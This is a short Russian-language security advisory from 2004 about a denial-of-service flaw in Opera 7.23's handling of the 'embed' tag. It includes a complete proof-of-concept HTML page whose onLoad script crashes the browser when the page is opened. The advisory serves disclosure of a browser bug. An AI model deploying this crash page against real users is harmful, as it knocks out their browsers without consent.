Security Lab

Удаленный отказ в обслуживании в Opera

Дата публикации:04.09.2004
Всего просмотров:1817
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.23 build 3227

Описание: Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя.

Пример/Эксплоит:

<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>

</head>
<body onLoad="dSend()">

<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>

URL производителя: http://www.opera.com/

Решение:Опера 7.21 не уязвима.

Ссылки: Opera DOS